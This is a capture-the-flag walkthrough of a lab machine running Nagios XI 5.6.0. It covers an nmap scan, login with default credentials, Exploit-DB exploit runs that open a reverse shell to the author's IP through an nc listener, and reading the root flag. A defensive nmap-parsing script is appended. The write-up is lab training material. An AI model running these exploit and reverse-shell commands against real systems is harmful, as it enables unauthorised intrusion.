๐Ÿ๏ธMonitoring

nmap -sV -sC -Pn -p- 192.168.121.136 --open

“-sC” – default scripts, “-sV” – service version detection, “-Pn” – skip host discovery, “-p-” – all ports, and “--open” – show only the open ports

Since a web server is open, I will visit the website.

http://192.168.121.136/

https://192.168.121.136/

I proceeded to click “Access Nagios XI” and it brought me to a login page.

I looked up the default credentials and found the username to be “nagiosadmin” and the password to be “admin”. I tried these credentials, and they worked.

Looking around on this website, I found that the website was Nagios XI 5.6.0.

I searched for an exploit for Nagios XI 5.6.0 and I came across several.

I downloaded this file and moved it to my current working directory. I then started a reverse shell listener on my local machine using the command nc -nvlp 4444.

searchsploit Nagios XI 5.6

searchsploit -m php/webapps/47299.php

nc -nvlp 4444

47299.php -t http://192.168.121.136/ -b /nagiosxi/ -u nagiosadmin -p admin -lh -lp 4444

The above payload is not working, so I will try another one.

searchsploit -m linux/webapps/46221.py

I checked the syntax required by the script:

python 46221.py

usage: 46221.py [-h] -t T -ip IP [-port PORT] -ncip NCIP [-ncport NCPORT]

python 46221.py -t http://192.168.121.136/ -b /nagiosxi/ -u nagiosadmin -p admin -lh -lp 4444

I searched the internet for another exploit and found the one below, which I will try:

https://www.exploit-db.com/exploits/52138

python3 exp.py -t https:/// -b // -u user -p 'password' -lh -lp -k (ignore cert)

python3 exploit_monitoring.py -t http://192.168.121.136/ -b /nagiosxi/ -u nagiosadmin -p admin -lh 192.168.45.212 -lp 4444 -k

Now we have got the shell.

We will use the commands below to get a stable shell:

  • which python – to identify the Python interpreter available on the victim machine

  • python -c 'import pty;pty.spawn("/bin/bash")'

Next, we wanted to find the proof.txt flag so we could submit it in PG Play. There is only one flag for this machine, “proof.txt”, which I located using the command

find / -name proof.txt 2>/dev/null

cat /root/proof.txt

Main Takeaway Concepts

DEFAULT CREDENTIALS

Default credentials are always worth trying. It never hurts to look up the default credentials for a product and attempt to log in with them. Weak credentials (and default credentials) should always be changed, since they are a major vulnerability. In this case, I was able to use default credentials to log in to the website and, from there, identify a further exploit.

ALWAYS LOOK UP VERSIONS

Checking the versions of services and websites is an important part of finding out what can be exploited. After finding the exact version a service is running, look it up to see whether it is known to be exploitable. In this case, after I was able to log in, a quick search showed that the website version was vulnerable. This led me to the exploit that worked and gave me a root shell on the target machine.
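As an added example (not part of the original writeup), the script below turns the version takeaway into a repeatable check: it parses the port table that `nmap -sV` prints and flags any product whose version is below a watchlist's first fixed version, comparing versions numerically rather than as strings. The scan excerpt and the WATCHLIST values are constructed placeholders, not real advisory data.

```python
import re
from typing import Dict, List, Tuple

# One port line of nmap's normal output: "80/tcp open http Apache httpd 2.4.18 ((Ubuntu))"
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+open\s+(?P<service>\S+)\s*(?P<banner>.*)$")
VERSION = re.compile(r"\d+(?:\.\d+)+")

def version_key(v: str) -> Tuple[int, ...]:
    """Numeric tuple so 5.6.10 sorts after 5.6.9 (a string compare would not)."""
    return tuple(int(p) for p in v.split("."))

def parse_nmap_sv(output: str) -> List[Dict[str, str]]:
    """Return port, proto, service, product and version for each open port."""
    services = []
    for line in output.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:
            continue
        banner = m.group("banner")
        vm = VERSION.search(banner)
        services.append({
            "port": m.group("port"), "proto": m.group("proto"),
            "service": m.group("service"),
            "product": (banner[:vm.start()] if vm else banner).strip(),
            "version": vm.group(0) if vm else "",
        })
    return services

def flag_versions(services, watchlist) -> List[Tuple[str, str, str]]:
    """Flag a service whose product is in the watchlist and whose version is
    below the first fixed version; a matching product with no version is
    reported as "unknown", since a missing banner is not evidence of safety."""
    findings = []
    for s in services:
        for name, fixed_in in watchlist.items():
            if name.lower() not in s["product"].lower():
                continue
            if not s["version"] or version_key(s["version"]) < version_key(fixed_in):
                findings.append((s["port"], s["product"], s["version"] or "unknown"))
    return findings

# Constructed scan excerpt and watchlist (placeholder values, not real advisories)
SAMPLE_SCAN = """\
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http    Apache httpd 2.4.18 ((Ubuntu))
"""
WATCHLIST = {"Apache httpd": "2.4.99", "OpenSSH": "7.2"}
```

Feed it the saved output of the page's nmap command (`-oN`) and maintain WATCHLIST from your own advisory tracking; versions the banner does not reveal (like the Nagios XI version found only in the web UI) still need a manual check.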
